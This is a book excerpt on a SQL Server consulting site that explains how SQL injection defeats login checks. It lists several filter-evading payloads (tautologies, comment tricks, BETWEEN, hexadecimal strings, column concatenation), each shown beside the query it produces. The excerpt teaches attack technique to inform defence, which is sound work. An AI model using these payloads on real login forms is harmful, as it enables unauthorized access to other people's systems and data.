Call now: (800) 766-1884  



 Home


 SQL Server Tips
 SQL Server Training

 SQL Server Consulting
 SQL Server Support
 SQL Server Remote DBA



 Articles
 Services
 SQL Server Scripts
 Scripts Menu



 

 

 

   
  SQL Server Tips by Gama and Naughter


Other Security Considerations
 

There are many other ways to disrupt the code, the previous example could be prevented by filtering "--" but there are more vulnerabilities.

 

The AND condition requires that both operands are true and one way to force that to happen is to add an OR to both inputs, followed by an empty string and an equal sign. This will result in ''='', which is true and the OR will be true because one operand is already true.

 

' OR ''='   ' OR ''='

SELECT username from Table_users WHERE logname='' OR ''='' AND userpassword='' OR ''=''

 

The multiline comment /* */ is legal between TSQL code and it can turn part of the logic into a comment. The log name could take any value because the password would be ignored and an OR operator with a true operand would force the result to be true.

 

'/*   */ OR ''='

SELECT username from Table_users WHERE logname=''/*' AND userpassword='*/ OR ''=''

 

If the equal sign is filtered, other ones can be used:

 

' OR ''<'1  ' OR ''<'1

SELECT username from Table_users WHERE logname='' OR ''<'1' AND userpassword='' OR ''<'1'

If =, <, > are filtered, there is still the between  command:

 

' OR '' between  '' AND '     ' OR '' between  '' AND '

SELECT username from Table_users WHERE logname='' OR '' between '' AND '' AND userpassword='' OR '' between '' AND ''

 

If the filter removes empty strings or rejects input with more than two single quotes, it is still possible to insert a string by using its hexadecimal representation:

 

' OR 0x00<'abc    ' OR 0x00<'abc

SELECT username from Table_users WHERE logname='' OR 0x00<'abc' AND userpassword='' OR 0x00<'abc'

 

Another approach is to try guessing the column names and turn the string delimiters into empty strings:

 

'+logname+' '+userpassword+'

SELECT username from Table_users WHERE logname=''+logname+'' AND userpassword=''+userpassword+''
 


The above book excerpt is from:

Super SQL Server Systems
Turbocharge Database Performance with C++ External Procedures

ISBN: 0-9761573-2-2
Joseph Gama, P. J. Naughter

 http://www.rampant-books.com/book_2005_2_sql_server_external_procedures.htm
 

 

Burleson Consulting Remote DB Administration


 

 


 

 

 

 

 
Burleson is the America's Team

Note: The pages on this site were created as a support and training reference for use by our staff of DBA consultants.  If you find it confusing, please exit this page.

Errata?  SQL Server technology is changing and we strive to update our SQL Server support information.  If you find an error or have a suggestion for improving our content, we would appreciate your feedback.  Just  e-mail:and include the URL for the page.
 


Burleson Consulting
SQL Server database support

 

Copyright 1996 -  2013 by Vaaltech Web Services. All rights reserved.

Hit Counter